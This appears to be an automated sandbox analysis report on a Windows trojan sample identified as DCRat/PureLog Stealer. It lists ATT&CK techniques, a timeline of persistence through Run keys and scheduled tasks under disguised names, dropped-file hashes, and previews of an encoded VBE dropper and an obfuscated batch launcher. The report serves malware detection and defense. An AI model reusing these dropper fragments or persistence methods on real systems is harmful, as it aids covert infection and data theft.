                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Exploitation for Client Execution                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter                                    		21
                                    Registry Run Keys / Startup Folder                                    		21
                                    Registry Run Keys / Startup Folder                                    		2
                                    Obfuscated Files or Information                                    		Security Account Manager37
                                    System Information Discovery                                    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                                    Software Packing                                    		NTDS121
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets1
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials31
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                    Masquerading                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                                    Virtualization/Sandbox Evasion                                    		Proc Filesystem1
                                    Remote System Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                    Process Injection                                    		/etc/passwd and /etc/shadow1
                                    System Network Configuration Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1590003 Sample: DCobxod.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Antivirus detection for dropped file 2->90 92 16 other signatures 2->92 11 DCobxod.exe 3 6 2->11         started        14 upfc.exe 2 2->14         started        17 LaSqLWtOcizKrlm.exe 2->17         started        19 8 other processes 2->19 process3 file4 74 C:\Browserhost\intoHostperf.exe, PE32 11->74 dropped 76 H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe, data 11->76 dropped 21 wscript.exe 1 11->21         started        106 Antivirus detection for dropped file 14->106 108 Machine Learning detection for dropped file 14->108 signatures5 process6 signatures7 94 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->94 96 Suspicious execution chain found 21->96 24 cmd.exe 1 21->24         started        process8 process9 26 intoHostperf.exe 10 51 24->26         started        30 conhost.exe 24->30         started        file10 66 C:\Users\user\Desktop\zmrZuvIB.log, PE32 26->66 dropped 68 C:\Users\user\Desktop\xpPRZvtG.log, PE32 26->68 dropped 70 C:\Users\user\Desktop\wtcqJyWC.log, PE32 26->70 dropped 72 26 other malicious files 26->72 dropped 98 Antivirus detection for dropped file 26->98 100 Creates an undocumented autostart registry key 26->100 102 Machine Learning detection for dropped file 26->102 104 4 other signatures 26->104 32 cmd.exe 26->32         started        35 csc.exe 4 26->35         started        38 csc.exe 26->38         started        40 6 other processes 26->40 signatures11 process12 file13 78 Uses ping.exe to sleep 32->78 80 Uses ping.exe to check the status of other devices and networks 32->80 42 PING.EXE 32->42         started        56 2 other processes 32->56 62 C:\Program Files (x86)\...\msedge.exe, PE32 35->62 dropped 82 Infects executable files (exe, dll, sys, html) 35->82 44 conhost.exe 35->44         started        46 cvtres.exe 35->46         started        64 C:\Windows\...\SecurityHealthSystray.exe, PE32 38->64 dropped 48 conhost.exe 38->48         started        50 cvtres.exe 38->50         started        84 Loading BitLocker PowerShell Module 40->84 52 conhost.exe 40->52         started        54 conhost.exe 40->54         started        58 4 other processes 40->58 signatures14 process15 process16 60 Conhost.exe 42->60         started       

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    DCobxod.exe56%VirustotalBrowse
                                    DCobxod.exe47%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    DCobxod.exe100%AviraVBS/Runner.VPG
                                    DCobxod.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\ProgramData\SoftwareDistribution\winlogon.exe100%AviraHEUR/AGEN.1339906
                                    C:\Recovery\upfc.exe100%AviraHEUR/AGEN.1339906
                                    C:\Browserhost\intoHostperf.exe100%AviraHEUR/AGEN.1339906
                                    C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe100%AviraVBS/Runner.VPG
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe100%AviraHEUR/AGEN.1339906
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat100%AviraBAT/Delbat.C
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe100%AviraHEUR/AGEN.1339906
                                    C:\ProgramData\SoftwareDistribution\winlogon.exe100%Joe Sandbox ML
                                    C:\Recovery\upfc.exe100%Joe Sandbox ML
                                    C:\Browserhost\intoHostperf.exe100%Joe Sandbox ML
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe100%Joe Sandbox ML
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\AkShQvXv.log8%ReversingLabs
                                    C:\Users\user\Desktop\CdhQCsIu.log25%ReversingLabs
                                    C:\Users\user\Desktop\DaJYXsXp.log21%ReversingLabs
                                    C:\Users\user\Desktop\GTYGJoJn.log25%ReversingLabs
                                    C:\Users\user\Desktop\HhGhtKRk.log8%ReversingLabs
                                    C:\Users\user\Desktop\NzFoXiJZ.log21%ReversingLabs
                                    C:\Users\user\Desktop\QQZxdmXS.log29%ReversingLabs
                                    C:\Users\user\Desktop\QuHEOinP.log17%ReversingLabs
                                    C:\Users\user\Desktop\TBFNkAhL.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\TkyvVenI.log8%ReversingLabs
                                    C:\Users\user\Desktop\WuUwVxTJ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\XrvErxiE.log5%ReversingLabs
                                    C:\Users\user\Desktop\ZuimMgmz.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\bnxVycYy.log9%ReversingLabs
                                    C:\Users\user\Desktop\jcBCwIrh.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\kIWsDnNZ.log8%ReversingLabs
                                    C:\Users\user\Desktop\nBlbpjyY.log12%ReversingLabs
                                    C:\Users\user\Desktop\pEXJLSDT.log25%ReversingLabs
                                    C:\Users\user\Desktop\urpInPSH.log17%ReversingLabs
                                    C:\Users\user\Desktop\wtcqJyWC.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\xpPRZvtG.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\zmrZuvIB.log21%ReversingLabsByteCode-MSIL.Trojan.Generic

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    No Antivirus matches

                                    Domains and IPs

                                    Contacted Domains

                                    No contacted domains info

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/pscore68powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameintoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3658740725.0000021210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            No contacted IP infos

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1590003
                                                            Start date and time:2025-01-13 13:18:11 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 11m 0s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:64
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Sample name:DCobxod.exe
                                                            Detection:MAL
                                                            Classification:mal100.spre.troj.expl.evad.winEXE@56/79@0/0
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, schtasks.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.253.45, 52.149.20.212
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 733812cm.n9shteam.in, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target intoHostperf.exe, PID 5828 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            07:19:22API Interceptor156x Sleep call for process: powershell.exe modified
                                                            13:19:15Task SchedulerRun new task: upfc path: "C:\Recovery\upfc.exe"
                                                            13:19:16Task SchedulerRun new task: upfcu path: "C:\Recovery\upfc.exe"
                                                            13:19:19Task SchedulerRun new task: explorere path: "C:\Users\Default\NetHood\explorer.exe"
                                                            13:19:19Task SchedulerRun new task: LaSqLWtOcizKrlm path: "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:19:19Task SchedulerRun new task: LaSqLWtOcizKrlmL path: "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:19:20Task SchedulerRun new task: winlogon path: "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:19:20Task SchedulerRun new task: winlogonw path: "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:19:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Recovery\upfc.exe"
                                                            13:19:23Task SchedulerRun new task: explorer path: "C:\Users\Default\NetHood\explorer.exe"
                                                            13:19:24Task SchedulerRun new task: intoHostperf path: "C:\Browserhost\intoHostperf.exe"
                                                            13:19:24Task SchedulerRun new task: intoHostperfi path: "C:\Browserhost\intoHostperf.exe"
                                                            13:19:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:19:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:19:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Users\Default\NetHood\explorer.exe"
                                                            13:19:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run intoHostperf "C:\Browserhost\intoHostperf.exe"
                                                            13:20:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Recovery\upfc.exe"
                                                            13:20:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:20:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:20:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Users\Default\NetHood\explorer.exe"
                                                            13:20:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run intoHostperf "C:\Browserhost\intoHostperf.exe"
                                                            13:20:53AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Recovery\upfc.exe"
                                                            13:21:03AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:21:12AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:21:21AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Users\Default\NetHood\explorer.exe"
                                                            13:21:29AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run intoHostperf "C:\Browserhost\intoHostperf.exe"
                                                            13:21:46AutostartRun: WinLogon Shell "C:\Recovery\upfc.exe"

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASNs

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Browserhost\35666d3dd70e20

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):194
                                                            Entropy (8bit):5.649145206495066
                                                            Encrypted:false
                                                            SSDEEP:6:xSRQCsyTqQL7s7SSWIK9geuhl9aR2t2btBM:URQCsyn/s7UNPGlsKo6
                                                            MD5:587E79F1259E7E719E60708AE6B0C800
                                                            SHA1:5E7C822F8664429E3ECC099BDC10DF8DCFB98C93
                                                            SHA-256:91D4C2D8931EEDFB4A0677887F1C7C9BF5B8BB32D5A3EF5420AFDAF8614F0386
                                                            SHA-512:4B0DCC10F0E2A2716B04E9F202D0E4984D2727188859B6B1F6F3751DF31C3FD1D671B8947A9D024551A92624FA64719E368AD9AAB02EC26B3B07766D4ED7E96F
                                                            Malicious:false
                                                            Preview:LzNk9wqw6DfNUvaZEhgV5CcnmAdRNKxcY6jClCs9nEU3LD70OqhDBKQIXk89SYjvQDzYLYxCygr0riciCmDgntaOqapAEtrPfinHOip02fOecZbyIZ7pUCIgmlsvsx7FzcVI4UUe7NoIe6vQ902ovB4caHfm04HFhIoADS4yEcsHYABqzbv24TTyi2sxysoDFi

                                                            C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\DCobxod.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):193
                                                            Entropy (8bit):5.718995944823469
                                                            Encrypted:false
                                                            SSDEEP:6:G9t2wqK+NkLzWbHa/818nZNDd3RL1wQJR8qHUD/IfU1:G9FMCzWLaG4d3XBJSbv1
                                                            MD5:469F076B98518FC3F174277AE4E7C6C2
                                                            SHA1:F47B8EE20D1901242563BCA5949B2FC9B8DCCE32
                                                            SHA-256:27F62059A2E4543D324D2DC4B57FA3AFCCB086411EE077C136C9732800987DD9
                                                            SHA-512:6BF0A52C4BB33945C00C637FB50298975F060F4209F6C5655352A656B239CF47D78F4E1088EB7D0DF5CDE52915E704CEC485BABFA33284B501394A06AC40C214
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:#@~^qAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJA.Khk+D4WkOzJqTM"R8CDJ~,T~,0l^dnezQAAA==^#~@.

                                                            C:\Browserhost\I0GR.bat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\DCobxod.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):85
                                                            Entropy (8bit):5.24016648925236
                                                            Encrypted:false
                                                            SSDEEP:3:6VGXIRjydtpUFnNt2qTLVaT5A:6VGYFydtp4t2iLYNA
                                                            MD5:FB60A3F4D062529781B1856A97F6D2A8
                                                            SHA1:1DA3695E467BE7E3A89CE9C7DE7DB683E6E438FE
                                                            SHA-256:81FCF50EDA7D7A8A0170239AEE3D3741E2AB76D1AA7AF8800C2E47CF182DCDF0
                                                            SHA-512:1F99A3B004752DB78FB8E9E4D097F866BAD641CD196CCB6D639C40C4C3DDA87B5E1A7A7836C8A276B965AC50F1B8B43731BF12D592CD5993938769D1196593E4
                                                            Malicious:false
                                                            Preview:%zKbJqSWcrMp%%AHGFNCOCwVmBLH%..%YEb%"C:\Browserhost/intoHostperf.exe"%ekfRBEEBSUFTRl%

                                                            C:\Browserhost\LaSqLWtOcizKrlm.exe

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*

                                                            C:\Browserhost\c884dbb5960701

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (823), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):823
                                                            Entropy (8bit):5.9024954624571935
                                                            Encrypted:false
                                                            SSDEEP:24:dAbeOiJ7T6YTsTdv8OX4RfcXD8xid0VHHyjpi:UsTv4ddX4RfcXD8AdWnyQ
                                                            MD5:E0B9C15C7C302A3A8D34DF75924255FD
                                                            SHA1:B3850147EE96BE03F38B3D04C27F59A939CB3626
                                                            SHA-256:D8D6D69C2F5D729F49B58FE8D5DA519141603BD50C00EBBA8ED7E7F348127454
                                                            SHA-512:0F9986899BDCACB100D15FB507EA694236F76B56EDF5444263997B8349AD52DBF2DA827841A42AD306E2EB4DA4280A5BD81CEF47BC3B935857B840B56AFCEFB7
                                                            Malicious:false
                                                            Preview:wYIPKOy0cLjG9WyoCzZpZEPE51tAfvyTs95P50YWhaTBHzDNeouO9ZZsIDTTfyUqWPYAbitLbDI8uN7Fxfg1BjUSjMH1hE1tFno1bDv54ix6Qb84GNf9Rdox5GaOb1oWLZ2HjFottl6dwXBIOMvTi2bm815VnhdC3av1j0VAiwPpgLAiERAPGUxS8PJrJTGMH4jVmKjX0vvwmvFw1XQVgN6inc3Tro0OpChmlo54smZUjAqMKW0wDup48AsKRQqM5gGjNdKMcWn4xl9mvqIUxEL5Wnol6unb6NZC3G8rMoTrGvGWBFYkHVY1ULMkyjPrtM7kM6sprbIJuezlhRj0WCUkziss3Y2mYl84ygKEXt2pNOG0WlDh9ZVq1XvnO9vTjfuIg4wBHedmJoXkb2WRVUm9QRCaug0X7jFrd8TbyCZf5shN9KMVnd8O2v2O2VQknGpkipGdi5dT5HDhuybkTetdl1ysGEidwz1zD6pTDtxrAoTvrUeD4pQJWL8r1YWdW9hFQOdxJHhkrBd6hDBvkfiGisd277cpWTVAHNfd0r3xIqbUrCJyXl31bahhulzMp1NXqcyThi43lv81QJK5xoSuadjrq7sP1rIQcDnPN0QyrAQqcqRla3YAjd7N3Hnk0oB3mrZMf5r7XdDaN2P9pGz7THq9GaWGMp8C8WDuQEGfManGZg9A2n4tzDkfBZGFjluseBb1zfslATv2ejkjaVNjuPM5whs18A6kp5mXFILX4TtfRrBbzgoNXL7OygERw1m9XLMi7MeSK0obgrnEfRCcWsMe8XjiD3lDqtIGecemBWDhgfsH2Av

                                                            C:\Browserhost\intoHostperf.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\DCobxod.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
